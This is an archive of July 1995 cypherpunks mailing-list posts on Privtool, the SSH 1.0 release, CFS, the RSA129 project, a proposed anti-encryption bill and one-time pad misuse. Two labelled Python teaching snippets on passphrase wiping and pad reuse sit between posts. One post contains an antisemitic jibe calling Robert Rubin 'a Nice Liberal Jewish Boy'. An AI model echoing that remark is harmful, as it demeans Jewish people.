Message-ID: <Pine.3.89.9507121633.A23453-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Ok, version 0.84 didn't work properly on Linux, so I'm now releasing
a version 0.84a with fixes to make it compile. US users can get the
sources from ftp.c2.org:/pub/privtool/privtool-0.84a.tar.gz, or
in Europe at ftp.ox.ac.uk:/pub/crypto/pgp/utils/privtool-0.84a.tar.gz.
It will also be available soon on ftp.dsi.unimi.it.

US ITAR laws may make it a crime to export Privtool, so if (like
me) you're not in the US then get it from the European sites.

In addition the documentation is available on the WWW at 
http://www.c2.org/~mark/privtool/privtool.html.

		Mark

	Privtool Beta Release	@(#)README.1ST	1.16 7/12/95
	-----------------------------------------------------

Privtool ("Privacy Tool") is intended to be a PGP-aware replacement 
for the standard Sun Workstation mailtool program, with a similar user 
interface and automagick support for PGP-signing and PGP-encryption. Just 
to make things clear, I have written this program from scratch, it is
*not* a modified mailtool (and I'd hope that the Sun program code
is much cleaner than mine 8-) !). 

When the program starts up, it displays a list of messages in your 
mailbox, along with flags to indicate whether messages are signed 
or encrypted, and if they have had their signatures verified or 
have been decrypted.

When you double click on a message, it will be decrypted (requesting
your passphrase if necessary), and/or will have the signature checked,
and the decrypted message will be displayed in the top part of the
display window, with signature information in the bottom part. The
mail header is not displayed, but can be read by pressing the 'Header'
button to display the header window. In addition, the program has
support for encrypted mailing list feeds, and if the decrypted
message includes another standard-format message it will replace
the original message and be fed back into the display processing
chain.

When composing a message or replying to one, the compose window has
several check-boxes, including one for signature, and one for
encryption. If these are selected, then the message will be automatically
encrypted and/or signed (requesting your passphrase when necessary) before
it is sent. You may also select a 'Remail' box, which will use the
Mixmaster anonymous remailer client program to send the message through
one or more remailers.

Being a Beta release, there are a number of bugs and nonfeatures :

Known Bugs :

	Message list scrollbar often set to stupid position when loading
	a mail file.

	When you save changes to the mail file, it throws away the
	signature verification and decrypted messages, so that the
	next time you view a message it has to be verified or decrypted
	again.

	'New mail' indicator in icon does not go away if you open the
	window and close it again without reading any messages.

Known Nonfeatures :

	Currently if you send encrypted mail to multiple recipients, all must
	have valid encryption keys otherwise you will have to send the
	message decrypted. Also, the message will be sent encrypted to all
	users, not just the one who is receiving each copy.

	'Add Key' button is enabled and disabled as appropriate, but does
	not do anything ! A number of other buttons and menu items do
	not work either.

	Passphrase is stored in ASCII rather than MD5 form, making it
	easier for hackers to find if you're on a multi-user machine (of 
	course, you shouldn't be, but many of us are).

	Kill-by-subject does not work.

	Ignores Reply-To: lines, and could probably do with an improved
	mail-reading algorithm.

	Only one display window, and only one compose window.

	Code should be more modular to assist with ports to Xt, Motif, Mac,
	Windows, etc. 

	Not very well documented !

	Encrypted messages are saved to mail files in encrypted form. There
	is currently no option to save messages in decrypted form.

	No support for anonymous return addresses.

	Not very well tested on Solaris 2.x, or Linux.

Major changes for 0.84:

	Added 'Forward' option to 'Compose' button.

	Support for Mixmaster and multiple pseudonyms. Due to a bug in
	the current version of Mixmaster, note that messages have to
	be saved to a temporary file for mailing. 

	Fixed file descriptor leak in pgplib.c which could make the program
	hang occasionally when saving changes.

	Added support for 'smallring.pgp' to speed up access to commonly
	used public keys.

	This version is thought to work on Linux, however I haven't
	been able to test that myself. Changes supplied by
	David Summers (david@actsn.fay.ar.us).

Changes for 0.84a:

	Linux testing showed up some problems with 0.84. This has been
	solved by using Rich Salz's parsedate() function to parse the
	dates on mail messages. This is now supplied in a linux
	subdirectory, and appropriate changes made to the Makefile to
	allow it to compile correctly on Linux. Changes supplied by
	David Summers (david@actsn.fay.ar.us).

	Fixed another hang by deleting the lock file if we failed to
	open the mail file while saving a message.

Privtool can be compiled to either use PGPTools, or to fork off a copy of
PGP whenever it is needed. There are also a number of different security
level options for the passphrase, varying from 'read it from PGPPASS and
keep it in memory' to 'request it every time and delete it as soon as
possible', via 'request it when necessary and delete it if it's not used
for a while'.

See the README file for information on compiling the code, and the
user.doc file for user documentation (the little that currently 
exists). You should also ensure that you read the security concerns
section in user.doc before using the program.

		Mark Grant (mark@unicorn.com)



-----BEGIN PGP SIGNATURE-----
Version: 2.6

-----END PGP SIGNATURE-----
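The three passphrase-handling levels described in the announcement above, sketched as an added Python example (not Privtool's own code). The class and policy names, the idle period and the injected `prompt`/`clock` callables are assumptions; only the `PGPPASS` variable comes from the message.

```python
import os
import time
from enum import Enum


class Policy(Enum):
    KEEP = "keep"          # read it from PGPPASS and keep it in memory
    IDLE_TIMEOUT = "idle"  # request when necessary, delete if unused for a while
    ALWAYS_ASK = "always"  # request every time, delete as soon as possible


class PassphraseCache:
    """Holds a passphrase in a mutable buffer so it can be overwritten.

    Limitation: the str returned by prompt() or read from the environment
    is immutable in Python and cannot be wiped; only the cached copy is.
    """

    def __init__(self, policy, prompt, idle_seconds=300.0,
                 clock=time.monotonic, environ=None):
        self.policy = policy
        self._prompt = prompt              # callable returning the passphrase
        self._idle = idle_seconds
        self._clock = clock
        self._environ = os.environ if environ is None else environ
        self._buf = None                   # bytearray while cached
        self._last_used = 0.0
        self.prompts = 0                   # how often the user was asked

    def _wipe(self):
        if self._buf is not None:
            for i in range(len(self._buf)):
                self._buf[i] = 0           # overwrite before dropping
            self._buf = None

    def _expire_if_idle(self):
        if (self.policy is Policy.IDLE_TIMEOUT and self._buf is not None
                and self._clock() - self._last_used >= self._idle):
            self._wipe()

    def cached(self):
        self._expire_if_idle()
        return self._buf is not None

    def _acquire(self):
        if self.policy is Policy.KEEP and "PGPPASS" in self._environ:
            secret = self._environ["PGPPASS"]
        else:
            secret = self._prompt()
            self.prompts += 1
        self._buf = bytearray(secret.encode("utf-8"))

    def use(self, operation):
        """Run operation(passphrase_buffer) under the configured policy."""
        self._expire_if_idle()
        if self._buf is None:
            self._acquire()
        try:
            return operation(self._buf)
        finally:
            self._last_used = self._clock()
            if self.policy is Policy.ALWAYS_ASK:
                self._wipe()               # also zeroes the caller's view
```

The expiry here is lazy (checked on the next access); a long-running GUI client would also want a timer so the buffer is wiped even if the cache is never touched again.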




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 12 Jul 95 14:46:05 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Dr. Seuss, Technical Writer
In-Reply-To: <199507121756.KAA04759@netcom5.netcom.com>
Message-ID: <Pine.ULT.3.91.950712164553.5003A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thanks so much for lightening my day.  Submit it to rec.humour.funny.

____        Robert A. Hayden      <=> Cthulhu Matata
\  /__          -=-=-=-=-         <=>          -=-=-=-=-
 \/  /  Finger for Geek Code Info <=> hayden@krypton.mankato.msus.edu
   \/   Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Wed, 12 Jul 95 13:57:22 PDT
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Q E D_j a k
In-Reply-To: <199507121947.MAA28807@ix5.ix.netcom.com>
Message-ID: <Pine.A32.3.91.950712165501.10002C-100000@JAGUAR.ZOO.CS.YALE.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 12 Jul 1995, Bill Stewart wrote:

> (Yes, I know one-time-pads are provably good crypto, but they also
> depend on the security of key distribution and one-time use,
> which apparently broke down here.  And the CIA's pretty good at
> chasing the guy with briefcases of code material handcuffed to their arms.)

Actually this stuff is most likely shipped under diplomatic pouch.

____
Ben Samman..............................................samman@cs.yale.edu
I have learned silence from the talkative, toleration from the intolerant,
and kindness from the unkind; yet, strange, I am ungrateful to those 
teachers.-- K. Gibran. SUPPORT THE PHIL ZIMMERMANN LEGAL DEFENSE FUND!
For information Email: zldf@clark.net       http://www.netresponse.com/zldf  

Ben.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 12 Jul 95 14:06:42 PDT
To: sdw@lig.net (Stephen D. Williams)
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <m0sW9UK-0009ydC@sdwsys>
Message-ID: <9507122105.AA11297@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Stephen D. Williams writes:
> It occurred to me that it wouldn't be too tough to have one CFSD
> open a TCP/socket connection to another CFSD and pass file access
> requests instead of implementing them locally.  The encryption
> of the ssh link and the on disk encryption of CFSD should be a 
> good combination.

The whole point of CFS was that you could mount remote devices that
were encrypted and decrypt them locally. CFS acts like a scrim over
existing file systems. If the remote machine has your keys on it
you've reduced security and, seemingly to me, gained very little.

Now, what *would* be really neat would be an implementation of CFS in
kernel under 4.4lite using the stacked vnode architecture. It would
probably be fairly simple to do it, and you wouldn't have any context
switches or the like when cfs'ing...

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 12 Jul 95 17:07:01 PDT
To: cypherpunks@toad.com
Subject: Re: RSA129 Project
In-Reply-To: <v01520d00ac2a09c57dc2@[144.38.16.209]>
Message-ID: <199507130006.RAA22366@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> rross@sci.dixie.edu (Russell Ross) writes:
> Could someone point me to information about the RSA129 factoring project?
> I would like to see the programs involved, and learn a little about the
> coordinating efforts.

There's a PostScript paper, programs, and coordinating tools at
ftp.ox.ac.uk:pub/math/rsa129

	Jim Gillogly
	Highday, 20 Afterlithe S.R. 1995, 00:06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 12 Jul 95 14:23:28 PDT
To: cypherpunks@toad.com
Subject: Anti-Electronic Racketeering Act of 1995 (fwd)
Message-ID: <Pine.SOL.3.91.950712171632.1850A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 12 Jul 1995 15:28:25 -0400
Subject: Anti-Electronic Racketeering Act of 1995


On June 27, Sen. Grassley introduced extensive criminal amendments to the
federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
(wiretapping), and 42 USC 2000aa (Privacy Protection Act).

This proposed legislation is Very Bad. It would make all encryption
software posted to computer networks that are accessible to foreigners
illegal *regardless of whether the NSA has classified the software as a
munition!!!*  Here's the language:

 "Sec. 1030A.  Racketeering-related crimes involving computers
   "(a) It shall be unlawful--

. . .

      "(2) to distribute computer software that encodes or encrypts
    electronic or digital communications to computer networks that the
    person distributing knows, or reasonably should know, is accessible to
    foreign nationals and foreign governments, regardless of whether such
    software has been designated nonexportable."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rross@sci.dixie.edu (Russell Ross)
Date: Wed, 12 Jul 95 16:28:28 PDT
To: cypherpunks@toad.com
Subject: RSA129 Project
Message-ID: <v01520d00ac2a09c57dc2@[144.38.16.209]>
MIME-Version: 1.0
Content-Type: text/plain


Could someone point me to information about the RSA129 factoring project?
I would like to see the programs involved, and learn a little about the
coordinating efforts.

-----------------------------------------------------------
Russell Ross                     email: rross@sci.dixie.edu
1260 N 1280 W                    voice: (801)628-8146
St. George, UT 84770-4953






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Wed, 12 Jul 95 13:54:24 PDT
To: ylo@cs.hut.fi (Tatu Ylonen)
Subject: Re: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
In-Reply-To: <199507121916.WAA06662@shadows.cs.hut.fi>
Message-ID: <m0sW9UK-0009ydC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > ssh, while an obvious name, already collides with a nice shar decoder and
> > a different kind of secure shell from CFS.
> 
> Ssh has already been registered with IANA (Internet Assigned Numbers
> Authority) as the name of the service.  I would rather not change it
> without a compelling reason.  It is also easy to obtain from rsh by
> replacing the r by s (which also makes for scp, sshd, and in future
> maybe also sdist).  It is my understanding that CFS is in rather
> limited use (especially outside the US), and the ssh shar extractor is
> not widely used either (neither can be found from the archie database
> at archie.funet.fi).  IETF has a thing called Site Security Handbook
> that they abbreviate SSH, but it is probably sufficiently different
> not to be confused.

I agree as the collisions aren't too bad (except in my /usr/local/bin...).

> > Of course support for S/Key and tokens/hand held authenticators would be
> > useful additions for some situations (although inferior to RSA...).
> 
> True.
> 
> The agent protocol can currently be used to forward a connection to
> any program (which can mean device) that can perform RSA
> authentication.  New authentication methods can be compatibly added
> later.
> 
> S/Key can be used by making skeysh your login shell.  Then you will
> first be asked for a normal password (if any), and then for the
> one-time password.  I did not want to incorporate skey functionality
> directly into the software, because it is not clear to me if the
> arrangements in use (file names, formats, algorithms) have stabilized
> yet.  Also, there is less need for skey as no passwords are
> transmitted in the clear.
> 
> > Integration with TCP/NFS and/or client-server CFS would be fantastic.
> > (One local CFS server acting as a secure client over tcp to a remote
> > CFS server.)
> > Remote encrypted mount of an encrypted partition...
> 
> Maybe, *maybe*, TCP/IP port forwarding could be used for this?  (I
> don't know what CFS does because I have never seen CFS.)

I was actually contemplating a modification to CFS to support a
tunneled TCP based NFS related operation.

CFS, like other specialized NFS servers, talks to NFS clients like
the normal NFS server, but runs on a different RPC port (so you can
run several types of NFS servers).  CFS encrypts directories that 
can be attached and detached without changing the NFS mount.

It occurred to me that it wouldn't be too tough to have one CFSD
open a TCP/socket connection to another CFSD and pass file access
requests instead of implementing them locally.  The encryption
of the ssh link and the on disk encryption of CFSD should be a 
good combination.

I've been compiling under Linux and have had a number of autoconfiguration
errors.  I'll produce a simple-minded patch shortly.
(Thinks I'm cross-compiling, have some include files I don't, don't
have waitpid/wait3, collision with stdc crypt/random defs, etc.)

>     Tatu

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 12 Jul 95 14:51:31 PDT
To: cypherpunks@toad.com
Subject: Re: [rah@shipwright.com: Re: digital monies]
Message-ID: <v02120d02ac29f2cdda83@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Steve,

I'm forwarding this to cypherpunks, where this posting originated. Always
ready to set the record straight. By the way, could I have an email copy of
your original posting/publicity material for this, I'm curious about where
it was announced to the net. Tighten up my links to the straight dope, etc.

Thanks!

Bob Hettinga


>Bob,
>
>Carl Ellison at TIS brought this to my attention.  We'll provide you with a
>lengthier response in a bit, but let me comment briefly that the following
>contains a number of inaccuracies.  Two of particular note: Citibank is not
>a principal in CyberCash, and the vaporware footnote is peculiar because
>our system has been operational since early April and the client software,
>which runs as a "viewer" with a number of browsers, is available from our
>web site for downloading around the world.
>
>Steve
>
>
>>CyberCash
>>The last I heard from these guys, a "consortium" of various heavies like RSA
>> and I believe Citibank even, was an article plastered all over the
>>Marketing section of the Wall Street Journal last fall. To my knowledge they
>>haven't come up for air. My memory of 'consortia' like this one, and
>>Citicorp in particular (who was trying to reverse engineer Chaum's Digicash
>>patent last time I looked), leads me to believe this dog won't hunt, or at
>>least not until the coon's already been treed, anyway. Cf: Citi's Quotron
>>boondoggle.
>
>--------------------
>Steve Crocker
>CyberCash, Inc., Suite 430                        Work: +1 703 620 4200
>2100 Reston Parkway                               Fax:  +1 703 620 4215
>Reston, VA 22091                                  crocker@cybercash.com

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 12 Jul 95 07:52:34 PDT
To: cypherpunks@toad.com
Subject: ANNOUNCEMENT: Ssh (Secure Shell) remote login program
Message-ID: <199507121451.RAA06122@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Looking for a secure rlogin?
Want to deter IP-spoofing, DNS-spoofing, and routing-spoofing?
Want to run X11 connections and TCP/IP ports securely over an insecure network?
Worried about your privacy?
Then read this.


Introducing SSH (Secure Shell) Version 1.0


Ssh (Secure Shell) is a program to log into another computer over a
network, to execute commands in a remote machine, and to move files
from one machine to another.  It provides strong authentication and
secure communications over insecure channels.  Its features include
the following:

   o    Strong authentication.  Closes several security holes (e.g., IP,
	routing, and DNS spoofing and listening for passwords from the
	network).  New authentication methods: .rhosts together with
	RSA based host authentication, and pure RSA authentication.

   o    All communications are automatically and transparently
        encrypted.  Encryption is also used to protect against spoofed
        packets.

   o    X11 connection forwarding provides secure X11 sessions.

   o    Arbitrary TCP/IP ports can be redirected over the encrypted
        channel in both directions.

   o    Client RSA-authenticates the server machine in the beginning of
        every connection to prevent trojan horses (by routing or DNS
        spoofing) and man-in-the-middle attacks, and the server RSA-
        authenticates the client machine before accepting .rhosts or
        /etc/hosts.equiv authentication (to prevent DNS, routing, or IP
        spoofing).

   o    An authentication agent, running in the user's local workstation
        or laptop, can be used to hold the user's RSA authentication
        keys.

   o    Multiple convenience features fix annoying problems with rlogin
        and rsh.

   o    Complete replacement for rlogin, rsh, and rcp.


Ssh is freely available, and may be used by anyone (see the file
COPYING in the distribution for more details).  There is no warranty
of any kind, and patents may restrict your right to use this software
in some countries.

Ssh is currently available for anonymous ftp at the following locations
   ftp.funet.fi:/pub/unix/security/ssh-1.0.0.tar.gz
   ftp.cs.hut.fi:/pub/ssh/ssh-1.0.0.tar.gz

Please let me know if you are willing to have your site act as a
distribution site.  (US sites warning: although this software was
developed outside the United States using information available in any
major bookstore or scientific library worldwide, it is illegal to
export anything containing cryptographic software from the United
States.  Putting this openly available for ftp in the US may make you
eligible for charges on ITAR violations, with penalties up to 10 years
in prison.  French and Russian sites warning: it may be illegal to use
or even possess this software in your country, because your government
wants to be able to monitor all conversations of its citizens.)

There is a WWW home page for ssh: http://www.cs.hut.fi/ssh.

There is a mailing list for ssh.  Send mail to ssh-request@clinet.fi
to get instructions (or mail directly to majordomo@clinet.fi with
"subscribe ssh" in body).


All official distributions of ssh are accompanied by a pgp signature
by the key "pub  1024/DCB9AE01 1995/04/24 Ssh distribution key
<ylo@cs.hut.fi>".  (Included below.)

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.i

- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.i

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 12 Jul 95 15:06:59 PDT
To: unicorn@access.digex.net
Subject: Re: NSA, Random Number Generation, Soviet Codes, Prohibition of Crypto
In-Reply-To: <199507122014.NAA19181@comsec.com>
Message-ID: <9507122202.AA13704@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


If I remember correctly from "Spycatcher", the Soviets misused the one time
pad allowing the Verona breaks, by using it twice, not by making slightly
weak rannos.

Of course, in this business, anything you read/hear could be a cover
story.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+
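Why using a one-time pad twice is fatal, as the message above mentions: an added example, not from the thread, with constructed plaintexts. `PadBook` is a hypothetical helper that enforces one-time use by destroying key bytes as they are consumed; `demo()` shows what leaks when that rule is bypassed.

```python
import secrets


def xor(a, b):
    """Byte-wise XOR of two equal-length byte strings."""
    if len(a) != len(b):
        raise ValueError("length mismatch")
    return bytes(x ^ y for x, y in zip(a, b))


class PadBook:
    """Pad material that can be consumed exactly once."""

    def __init__(self, material):
        self._material = bytearray(material)
        self._pos = 0

    def remaining(self):
        return len(self._material) - self._pos

    def take(self, n):
        if n > self.remaining():
            # Refuse to encrypt rather than wrap around and reuse key bytes.
            raise ValueError("pad exhausted")
        chunk = bytes(self._material[self._pos:self._pos + n])
        for i in range(self._pos, self._pos + n):
            self._material[i] = 0          # destroy used key bytes
        self._pos += n
        return chunk

    def encrypt(self, plaintext):
        return xor(plaintext, self.take(len(plaintext)))


def reuse_leak(c1, c2):
    """What a listener holds when two messages shared the same pad bytes:
    (p1 ^ k) ^ (p2 ^ k) = p1 ^ p2, so the pad drops out entirely."""
    return xor(c1, c2)


def demo():
    p1 = b"ATTACK AT DAWN.."               # constructed sample plaintexts
    p2 = b"RETREAT AT DUSK."
    pad = secrets.token_bytes(len(p1))     # perfectly random pad
    c1 = xor(p1, pad)
    c2 = xor(p2, pad)                      # the misuse: same pad a second time
    leak = reuse_leak(c1, c2)
    pad_cancelled = (leak == xor(p1, p2))  # true regardless of pad quality
    # Anyone who knows or guesses p1 reads p2 without ever seeing the pad.
    recovered = xor(leak, p1)
    return pad_cancelled, recovered


if __name__ == "__main__":
    print(demo())
```

The result does not depend on how random the pad is, which is the distinction the message draws between reuse and weak random numbers.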





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian A. LaMacchia <bal@martigny.ai.mit.edu>
Date: Wed, 12 Jul 95 15:21:13 PDT
To: bdolan@use.usit.net
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SOL.3.91.950712171632.1850A-100000@use.usit.net>
Message-ID: <9507122221.AA24506@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Wed, 12 Jul 1995 15:28:25 -0400
   Subject: Anti-Electronic Racketeering Act of 1995

   On June 27, Sen. Grassley introduced extensive criminal amendments to the
   federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
   1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
   18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
   (wiretapping), and 42 USC 2000aa (Privacy Protection Act).

   This proposed legislation is Very Bad. It would make all encryption
   software posted to computer networks that are accessible to foreigners
   illegal *regardless of whether the NSA has classified the software as a
   munition!!!*  Here's the language:

    "Sec. 1030A.  Racketeering-related crimes involving computers
      "(a) It shall be unlawful--

   . . .

	 "(2) to distribute computer software that encodes or encrypts
       electronic or digital communications to computer networks that the
       person distributing knows, or reasonably should know, is accessible to
       foreign nationals and foreign governments, regardless of whether such
       software has been designated nonexportable."

It's much worse than this.  Look at the definition of "predicate act":

            `(b) For purposes of this section, each act of distributing
          software is considered a separate predicate act. Each instance in
          which nonexportable software is accessed by a foreign government, 
          an agent of a foreign government, a foreign national, or an agent 
          of a foreign national, shall be considered as a separate predicate
          act.

Now, since the bill also makes 1030A violations "racketeering
activities", all you need are two predicate acts and RICO comes into
play.  

Finally, we begin to see the attack on all forms of un-escrowed
encryption.  The bill provides an affirmable defense of
giving the keys to the government ahead of time!

            `(c) It shall be an affirmative defense to prosecution under this
          section that the software at issue used a universal decoding device
          or program that was provided to the Department of Justice prior to
          the distribution.'.

There are also some nice surprises related to wiretapping evidence
(would allow the gov't. to use the fruits of an illegal wiretap
conducted by a third party if the government didn't know about the
wiretap) and the Privacy Protection Act.

Get a copy of this bill from:

		ftp://ftp.loc.gov/pub/thomas/c104/s974.is.FTP

and read it.  

					--bal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 12 Jul 95 15:20:52 PDT
To: Al Thompson <alt@iquest.net>
Subject: Re: RACIST MILITIA: ATF
In-Reply-To: <m0sVs4F-000BYfC@dorite1.iquest.net>
Message-ID: <Pine.3.89.9507121842.A22054-0100000@larry>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone got the address of the Southern Poverty Law Center? Wonder if 
they will go apeshit putting out press releases against the racist 
activities happening during the watch of Treasury Secretary Robert Rubin, 
a Nice Liberal Jewish Boy.....

Alan Horowitz
alanh@infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Wed, 12 Jul 95 10:04:21 PDT
To: cypherpunks@toad.com
Subject: Re: Why they can be sued... (Was: freedom of speech)
Message-ID: <v01510103ac2888fb20cd@[193.74.217.8]>
MIME-Version: 1.0
Content-Type: text/plain



>
>Last thursday there was a report in the news. They started a new
>lawsuit against a Nazi, who was already earlier sentenced for other
>Nazi crimes. He was sued because he distributed a video. In the video

Just to sidetrack the issue, a bit.  Are there any ex-Nazis who participated
in the Holocaust who would dispute this guy?

>
>I wanted to know in detail why he can be sued. Therefore I had a look
>into my book commenting the criminal law. I try to translate as good
>as I can.
>
>In the german criminal law there is a chapter about slander, libel and
>such things.
>
>Slander is seen in Germany not as a crime, but as an offence.  It
>differs from other offences in the detail, that the prosecuting attorney
>can't sue it himself. It needs the request of a 'victim'.
>
>If the victim dies, the right to request is transferred to the
>wife/husband and the children. If there aren't any, to the parents. If
>there aren't any, to the brothers/sisters and grandchildren.
>
>  Par. 189: Wer das Andenken eines Verstorbenen verunglimpft,
>  wird mit Freiheitsstrafe bis zu zwei Jahren oder mit
>  Geldstrafe bestraft.
>
>  Who decries the memory to a dead person, is punished with jail up
>  to two years or fine.
>

This is a little different from the US. I've never heard of anybody being
jailed or fined for libel/slander, just sued for it.

>
>This applies under certain circumstances to saying that the holocaust
>never happened.
>
>Do you have a law like this in America?
>
>

No. You can't libel the dead.  Most historians would get their socks sued
off if you could.  I remember reading about a case once in which two sons
wanted to sue the man who had libelled their dead father.  They couldn't do
it through normal channels, father being dead and all, so they publicly
called the libeller a liar, repeatedly, eventually provoking _him_ to sue
_them_ thereby allowing the truth of the original libel to be tested in
court.  The sons won; a moral victory at least.

>
>This is the reason why someone can be sued if he claims that the
>holocaust never happened. It is not the idea itself. The reason is
>that it can be a form of violence against dead people in the eyes of
>german law.
>

So in other words, the Holocaust-Denial crime is a creative extension of
existing libel laws.

>BTW: I have a collection of the most important german laws on my
>webserver. You can find the list at
>
>http://iaks-www.ira.uka.de/ta/Diverses/Gesetze/
>

Useful to know that.  Aachen is just down the road from here.



--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 12 Jul 95 16:23:57 PDT
To: cypherpunks@toad.com
Subject: Re: RACIST MILITIA: ATF
Message-ID: <199507122323.TAA19392@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by alanh@infi.net (Alan Horowitz) on Wed, 12 
Jul  6:21 PM



For those in time-zones west of NYC, NBC Lightly News covers 
the ATF happy campers, and interviews the majordomo, who 
solemnly meins that he will investigate and do what's right.


Another NBC LN item: DOJ is to "re-open" the look at the Ruby 
Ridge carnage.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 12 Jul 95 16:33:37 PDT
To: jim@acm.org
Subject: Re: Capt. Midnight decoder badges
Message-ID: <9507122330.AA18388@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


 25 13 23   20 26 2   17 13   16 11 12 18   9 12 16 11 13 23 16
 7 2 13 9 12 2 5   16 11 4   7 4 25.    11 13 9   15 13 2 5   17 13 4 18
 12 16   16 26 7 4? 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 12 Jul 95 16:36:54 PDT
To: cypherpunks@toad.com
Subject: the sound of another shoe dropping...
Message-ID: <9507122338.AA06723@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message
Forwarded message:
>From farber@eff.org  Wed Jul 12 16:41:13 1995
Posted-Date: Wed, 12 Jul 1995 15:28:18 -0400
X-Sender: farber@linc.cis.upenn.edu
Message-Id: <v02110184ac29d2a1b404@[130.91.88.102]>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
X-Priority: 1 (Highest)
Date: Wed, 12 Jul 1995 15:28:25 -0400
From: farber@central.cis.upenn.edu (David Farber)
Subject: Anti-Electronic Racketeering Act of 1995
Precedence: list
To: interesting-people@eff.org (interesting-people mailing list)
X-Proccessed-By: mail2list

Date: Wed, 12 Jul 1995 14:00:23 -0400
From: ssteele@eff.org (Shari Steele)

Heavy sigh.
On June 27, Sen. Grassley introduced extensive criminal amendments to the
federal racketeering act.  S. 974, the "Anti-Electronic Racketeering Act of
1995," would amend U.S. Code sections 18 USC 1961 (criminal RICO statute),
18 USC 1030A (new section on computer crime), 18 USC 2515, 2516
(wiretapping), and 42 USC 2000aa (Privacy Protection Act).

This proposed legislation is Very Bad. It would make all encryption
software posted to computer networks that are accessible to foreigners
illegal *regardless of whether the NSA has classified the software as a
munition!!!*  Here's the language:

 "Sec. 1030A.  Racketeering-related crimes involving computers
   "(a) It shall be unlawful--

. . .

